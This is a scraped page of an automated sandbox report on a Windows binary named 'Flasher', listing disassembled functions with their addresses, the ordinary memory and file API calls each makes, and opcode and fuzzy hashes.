Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeapmemcmp
String ID:
API String ID: 2929263700-0
Opcode ID: 8456d2698544595e5ec8b2e24706bebeffe83d47eee8970aeac385fcece02df2
Instruction ID: 5a40c9b4ed87170aa15d483ffb3b74bd018faaac3575b9fbe655a0538d5b8965
Opcode Fuzzy Hash: 8456d2698544595e5ec8b2e24706bebeffe83d47eee8970aeac385fcece02df2
Instruction Fuzzy Hash: 6651B422A18B8581E6218B16E4413AEF364FB89BD4F485237EE8DA3B94DF3CD591C700

Function 00007FF6D35DCB60 Relevance: 3.9, APIs: 3, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 238e05d4d0be44c1557c8a40a5e45a6591c621f8938cdd96383396b61838066d
Instruction ID: 0a28fec37f167c9ff0af3b587d2b8f0560957da3d2bffdb2161e9ecc2f8a46da
Opcode Fuzzy Hash: 238e05d4d0be44c1557c8a40a5e45a6591c621f8938cdd96383396b61838066d
Instruction Fuzzy Hash: 9141D862F19A4985F704CB65A8063AC9760BF84B98F148537CE1CB7794DF3CD496C300

Function 00007FF6D35DD2A0 Relevance: 3.9, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D35DC360: NtReadFile.NTDLL ref: 00007FF6D35DC3A4
Part of subcall function 00007FF6D35DC360: WaitForSingleObject.KERNEL32 ref: 00007FF6D35DC3B9

memmove.VCRUNTIME140 ref: 00007FF6D35DD3DB

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FileObjectReadSingleWaitmemmove
String ID:
API String ID: 794704148-0
Opcode ID: 6f376b4c74c12a602ef57226442ccb49b1f100bd83c0fee0b054d20d9a06625a
Instruction ID: c83cb4933167cdffddc8fd55b38bf32d0278c8a9e7c98c457a4fec9ff69f954e
Opcode Fuzzy Hash: 6f376b4c74c12a602ef57226442ccb49b1f100bd83c0fee0b054d20d9a06625a
Instruction Fuzzy Hash: D031D322B05A45C5EA14CB66ED066ACA761FF84BE4F188533DE1DA3B94DF3CE092C300

Function 00007FF6D35DC150 Relevance: 3.9, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D35DC360: NtReadFile.NTDLL ref: 00007FF6D35DC3A4
Part of subcall function 00007FF6D35DC360: WaitForSingleObject.KERNEL32 ref: 00007FF6D35DC3B9

memmove.VCRUNTIME140 ref: 00007FF6D35DC28B

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FileObjectReadSingleWaitmemmove
String ID:
API String ID: 794704148-0
Opcode ID: d0d3949f83f4eded4874991e53e3d80ae87d59719e39a471d29c50b576c27c93
Instruction ID: dbc85ead9e64dc7a61c35152ef1c8e23c2a2322f529e972247fe865ba3ba5c33
Opcode Fuzzy Hash: d0d3949f83f4eded4874991e53e3d80ae87d59719e39a471d29c50b576c27c93
Instruction Fuzzy Hash: 5F31D122B44A55C5EA14CB66E9063ACA731BB88BE4F588533DE5DA7B94DF3CD092C300

Function 00007FF6D357942D Relevance: 3.8, APIs: 3, Instructions: 70COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,00007FF6D3579585,?,?,?,?,?,00007FF6D357965E), ref: 00007FF6D3579490
memmove.VCRUNTIME140(?,?,?,?,00007FF6D3579585,?,?,?,?,?,00007FF6D357965E), ref: 00007FF6D35794B6
memmove.VCRUNTIME140(?,?,?,?,00007FF6D3579585,?,?,?,?,?,00007FF6D357965E), ref: 00007FF6D35794D6

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 99260a4ac43c5302e530d71ea301cdc612e686f0c1fbed2658aebd7af000aad1
Instruction ID: 0b8529d95357c49d31c654363edbf215333bb7f492545f617de5d5c0bfdf8af2
Opcode Fuzzy Hash: 99260a4ac43c5302e530d71ea301cdc612e686f0c1fbed2658aebd7af000aad1
Instruction Fuzzy Hash: 9221A4A2A04A4542EA349B22E9557ADE761BF06BD0F048437CE6E67FA1DE3CE0529304

Function 00007FF6D351E046 Relevance: 3.8, APIs: 3, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6D351D482
HeapFree.KERNEL32 ref: 00007FF6D351D710
HeapFree.KERNEL32 ref: 00007FF6D351D890

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap$memmove
String ID:
API String ID: 2650465384-0
Opcode ID: 179d5a11e961b4867e1020b02792c61203af529cf97795a71329f0e9d9343d39
Instruction ID: 1cdac7b80f8eb8cc7e0c4137c90e88a16813e834761b87be310be25401239336
Opcode Fuzzy Hash: 179d5a11e961b4867e1020b02792c61203af529cf97795a71329f0e9d9343d39
Instruction Fuzzy Hash: 30212C30E4D98A80E975AB1294562BDE390AF95780F484437D84EF7B99CF7CE8A1D704

Function 00007FF6D3733972 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 190COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF6D3733A99

Part of subcall function 00007FF6D35028C1: memmove.VCRUNTIME140(?,?,?,00000000,00007FF6D3733F88), ref: 00007FF6D350292F

Strings

0, xrefs: 00007FF6D3733AA3

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memmovememset
String ID: 0
API String ID: 1288253900-4108050209
Opcode ID: 0373d1ec85dc086fe9c27896b2e0ffea76234fdf356b3906c0880a7418990436
Instruction ID: 20e78dd6016ca4bf0e8caddd37e4336c86e9b389b45840eed1aaaf663ce42511
Opcode Fuzzy Hash: 0373d1ec85dc086fe9c27896b2e0ffea76234fdf356b3906c0880a7418990436
Instruction Fuzzy Hash: 6E71E563A18F8982EA24CB19E5012ADA760F754B94F445736DFAE637E5EF3CD065C300

Function 00007FF6D35DC040 Relevance: 3.1, APIs: 2, Instructions: 69COMMON

Download Yara Rule

APIs

GetFileInformationByHandleEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6D35DF904), ref: 00007FF6D35DC0A3
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6D35DF904), ref: 00007FF6D35DC123

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: ErrorFileHandleInformationLast
String ID:
API String ID: 275135790-0
Opcode ID: b2800c01d4a0b6e0ae6cfacb6640a5868ac782acb592ae54ba47d2c9a4290ed9
Instruction ID: af1bb8b78510e63fee2a254f8e7eb93e515050adf0b748e4a9151b7ec6c8db9c
Opcode Fuzzy Hash: b2800c01d4a0b6e0ae6cfacb6640a5868ac782acb592ae54ba47d2c9a4290ed9
Instruction Fuzzy Hash: 45314C72A146518BF320CFA5E8417ADB7B0FB58788F108125DF9963B44EF78E991C750

Function 00007FF6D35EF740 Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

GetOverlappedResult.KERNEL32 ref: 00007FF6D35EF785
GetLastError.KERNEL32 ref: 00007FF6D35EF7D1

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: ErrorLastOverlappedResult
String ID:
API String ID: 185562886-0
Opcode ID: 0bf254be5dce02d381a3ff03b406df64ddad6841e4ecc19538bb80963aab3f65
Instruction ID: fade88c46bb033dd5d633005f02f1839592310e683b2f8fae4149a5707eaee55
Opcode Fuzzy Hash: 0bf254be5dce02d381a3ff03b406df64ddad6841e4ecc19538bb80963aab3f65
Instruction Fuzzy Hash: C9116A2BF1875A95FB688A62C54237DA660AB45784F1A0837CE1DF3B84CF38E4B19210

Function 00007FF6D35DD5F0 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF6D36109E7), ref: 00007FF6D35DD617
GetLastError.KERNEL32(?,?,?,?,?,00007FF6D36109E7), ref: 00007FF6D35DD629

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fb203139ff1ff435133bc42319f49413190dd0bb698b1ba704a672b92036fbaf
Instruction ID: acf8946083501338af79fad7b7a15ff0d5d04e8d4f5d61e2c4b3bdcf39da0286
Opcode Fuzzy Hash: fb203139ff1ff435133bc42319f49413190dd0bb698b1ba704a672b92036fbaf
Instruction Fuzzy Hash: B0E0EDA5F14A85DAFB0097B1E4023EDA7A1AB48B84F880033CD4CA7348DE3CE1A4C290

Function 00007FF6D3726194 Relevance: 2.7, APIs: 2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44120a0c63f12277b5d72a0639278a37913bd5a2f55b4f0ab567adc4fd95264e
Instruction ID: 163e5601c475d4bbe61a3b6b80ea5d06beec33bbbb05b5eba9dde98491fb662c
Opcode Fuzzy Hash: 44120a0c63f12277b5d72a0639278a37913bd5a2f55b4f0ab567adc4fd95264e
Instruction Fuzzy Hash: 7DA1C436B08A8286EB70DE26C58193DB7A5FB44F98F144037CA4DD77A5DEB8E964C304

Function 00007FF6D36E5628 Relevance: 2.7, APIs: 2, Instructions: 166stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6D36E5664
memmove.VCRUNTIME140 ref: 00007FF6D36E57E4

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memmovestrlen
String ID:
API String ID: 3405231851-0
Opcode ID: 1e538c007ce42500fb47034b3200a02c5e5fa5007d29b494cc324cb040967b40
Instruction ID: bf9e52623834ed367421bde788fb682b2314c3b63088585dd73f959d1de9af60
Opcode Fuzzy Hash: 1e538c007ce42500fb47034b3200a02c5e5fa5007d29b494cc324cb040967b40
Instruction Fuzzy Hash: EE510A11A097D182FA559B26590617DABA0BF44BC0F048436DF4EE7BA5EE3CE425E700

Function 00007FF6D3535B9A Relevance: 2.7, APIs: 2, Instructions: 165COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,-0000003C,00000000,?,?,?,00007FF6D3535E37), ref: 00007FF6D3535C0A

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: e60561b9c0a30a80beb872fbd35096db2cbd1c98b46c39d5858ddf26955605b2
Instruction ID: cf27d733787a69fc07f0aba32c572b8aab623595947b73b46c098913804fd1e0
Opcode Fuzzy Hash: e60561b9c0a30a80beb872fbd35096db2cbd1c98b46c39d5858ddf26955605b2
Instruction Fuzzy Hash: BA517272709B4A82EA24CF16E4462ACA764FB14784F559832CF8EA7B51CF3DF5658340

Function 00007FF6D34F406D Relevance: 2.7, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39e5083847062552e83448504f1d8caa8d3dc84e8d198d52eb070f0aedc3c0f7
Instruction ID: 8f7a6594e139310440348508e399b5626e2772624b8a8914f55272575e0388be
Opcode Fuzzy Hash: 39e5083847062552e83448504f1d8caa8d3dc84e8d198d52eb070f0aedc3c0f7
Instruction Fuzzy Hash: 60710576618B8182D6609B46F84136EF7A5F789BD0F584136EE8D97B68CF3DD0A1CB00

Function 00007FF6D35DF580 Relevance: 2.6, APIs: 2, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D35DF7C0: memset.VCRUNTIME140 ref: 00007FF6D35DF92F
Part of subcall function 00007FF6D35DF7C0: FindFirstFileW.KERNEL32 ref: 00007FF6D35DF93A
Part of subcall function 00007FF6D35DF7C0: FindClose.KERNEL32 ref: 00007FF6D35DF949
Part of subcall function 00007FF6D35DF7C0: HeapFree.KERNEL32 ref: 00007FF6D35DF9E0

HeapFree.KERNEL32 ref: 00007FF6D35DF65D
HeapFree.KERNEL32 ref: 00007FF6D35DF670

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap$Find$CloseFileFirstmemset
String ID:
API String ID: 2317575439-0
Opcode ID: da94006322c7723b207a50dc5c5c4e895e44b38897a30b36d2501d4fe40e177e
Instruction ID: afb207e792345958b273dfcc084e4a1db0931a39adb040ada7bb8a7bd2010608
Opcode Fuzzy Hash: da94006322c7723b207a50dc5c5c4e895e44b38897a30b36d2501d4fe40e177e
Instruction Fuzzy Hash: D1516227E14B858AE7208F35E9413ACB760FB98758F049226DF9D62BA5DF38E1D5C340

Function 00007FF6D36CAC14 Relevance: 2.6, APIs: 2, Instructions: 74COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,?,00007FF6D36C648D,?,00000000,?,00007FF6D36C6161,?,?,?,00000000,00000035,?,?,?), ref: 00007FF6D36CACEF
memmove.VCRUNTIME140(?,?,?,00007FF6D36C648D,?,00000000,?,00007FF6D36C6161,?,?,?,00000000,00000035,?,?,?), ref: 00007FF6D36CACFE

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memmovememset
String ID:
API String ID: 1288253900-0
Opcode ID: fafe4497f334237b98f03d211de4b1360e3ada61a91b96e9834ee2c0b3f4386d
Instruction ID: 0387fed395a788f53bda32fdcde540e9f4d3adec4e4ce70eb4f69c357d61c9b4
Opcode Fuzzy Hash: fafe4497f334237b98f03d211de4b1360e3ada61a91b96e9834ee2c0b3f4386d
Instruction Fuzzy Hash: 3A21D732704A8287EB648F66E4816ADB760FB88B84F148032EF5D97755DF38D891C740

Function 00007FF6D35DF440 Relevance: 2.6, APIs: 2, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D35DF580: HeapFree.KERNEL32 ref: 00007FF6D35DF65D
Part of subcall function 00007FF6D35DF580: HeapFree.KERNEL32 ref: 00007FF6D35DF670

HeapFree.KERNEL32 ref: 00007FF6D35DF4C9
HeapFree.KERNEL32 ref: 00007FF6D35DF4DE

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ec982dfeece64499e658e951281a77ed7fda13c36d773b8f762b5709ae8424fe
Instruction ID: fd331144ba991febe56a100bc9711f059fd325203d6cc59209052795a749c7bd
Opcode Fuzzy Hash: ec982dfeece64499e658e951281a77ed7fda13c36d773b8f762b5709ae8424fe
Instruction Fuzzy Hash: 88216D27A08F559AEB10CB61E8453ADA360FB84B68F048237CE1DA7794DF38D555C340

Function 00007FF6D360D277 Relevance: 1.6, APIs: 1, Instructions: 139memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32 ref: 00007FF6D360D350

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: b15b679657002a586231db236e6f36ac5cf0e88c8b0464b65700d103173cb63c
Instruction ID: d9d29c9d00b50c17a27f54f32484a8918089a5cc02332da1e51af3960d34b98e
Opcode Fuzzy Hash: b15b679657002a586231db236e6f36ac5cf0e88c8b0464b65700d103173cb63c
Instruction Fuzzy Hash: B9410762F1A6E242FB7C06276423B3DDD42DF913C0E18823AEA5F96BC0DD7DA0217614

Function 00007FF6D35D9700 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(-8000000000000000,?,?,?,00007FF6D37383D4), ref: 00007FF6D35D9733

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2d66567e530e3d26393e6afbc162ee92cc08f2887579838573606ecd0dc08e91
Instruction ID: 3d96bfeabbd5280ee9582d12e235fda1efed5d7c015f99fb8c2e61b4be8de9b9
Opcode Fuzzy Hash: 2d66567e530e3d26393e6afbc162ee92cc08f2887579838573606ecd0dc08e91
Instruction Fuzzy Hash: 5601DB22A09B5982F6555B12B9463BCA390BF4AB90F484037DE1D97794DF3CA4B2C200

Function 00007FF6D35F3B19 Relevance: 1.5, APIs: 1, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000001,?,00007FF6D35D0737), ref: 00007FF6D35F3B46

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0e6437d9f92b7b2ce10eda25ef2eab246bbe6dcd70b08cedbcb8c7afa5650af1
Instruction ID: 54cf48df53d217c3501e9006849bb1da999d111c228eb295caf9e3d965922730
Opcode Fuzzy Hash: 0e6437d9f92b7b2ce10eda25ef2eab246bbe6dcd70b08cedbcb8c7afa5650af1
